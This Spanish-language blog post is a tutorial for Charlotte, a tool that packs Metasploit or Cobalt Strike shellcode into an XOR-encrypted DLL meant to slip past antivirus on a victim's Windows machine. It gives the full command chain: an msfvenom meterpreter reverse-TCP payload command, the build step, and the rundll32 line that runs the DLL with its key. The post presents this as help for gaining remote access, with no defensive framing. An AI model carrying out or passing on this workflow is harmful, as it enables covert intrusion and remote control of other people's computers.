Conejos Negros

Inseguridad en la red

Charlotte DLL FUD

En esta ocasión hablaremos de esta herramienta, la que promete crear un DLL FUD que haga Bypass de Antivirus.



Esta herramienta que podemos encontrar en el siguiente repositorio de Github:

https://github.com/9emin1/charlotte

La misma genera un DLL para Windows, el cual va a contener Shellcode que le proveamos, tanto sea de Metasploit como de Cobalt Strike, con la intención de ser inyectado y ejecutado en la memoria Ram de un equipo Windows victima, proporcionándonos acceso remoto al mismo siempre y cuando logre hacer Bypass de el software antivirus.

Que cantidad de conceptos que expusimos sin explicar, no se preocupen luego del video en el que se muestra la instalación y explotación con Charlotte los explicaremos. De todas maneras pueden utilizar el formulario de contacto de este sitio para trasladarme sus dudas, sin mas el video:



Comandos utilizados y explicaciones

Primero clonamos el repositorio con Git:

git clone https://github.com/9emin1/charlotte.git

Instalamos el unico requisito:

sudo apt-get install apt-get install mingw-w64*

El que es un Cross Compiler, es decir compila código (CSharp en este caso) en un equipo Linux para que funcione en Windows.

Como vimos en el video se debe de tener un Shellcode generado el cual puede ser de Metasploit, que lo generamos con el siguiente comando en nuestro sistema operativo Kali:

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=(nuestra dirección IP) LPORT=(nuestro puerto elegido) -f raw > beacon.bin

O con Cobalt Strike como se ve en el video. Dicho Shellcode con el nombre beacon.bin debe de ser colocado en la misma carpeta de Charlotte y ejecutamos el comando:

python3 charlotte.py

Mediante charlotte.py que es un script escrito en Python, es pasado por un método de encriptacion denominado XOR, luego colocado en una template o esqueleto de un programa escrito en Csharp, el que una vez compilado y convertido en un DLL puede ser ejecutado en un equipo Windows.

Si dicha ejecución es exitosa inyectara en la memoria Ram de ese equipo el Shelcode lo desencriptara y ejecutara, siempre que le proporcionamos la llave de desencriptacion correcta. Por ejemplo se ve en el video que se ejecuta con el comando:

rundll32 charlotte.dll, tvdvhbbdbdb

Donde Runddl32 es el encargado de ejecutar en Windows los DLL, el nombre del archivo y por ultimo la clave para desencriptar el shellcode.

Espero les sea de utilidad, de surgir dudas contactense.

Referencias: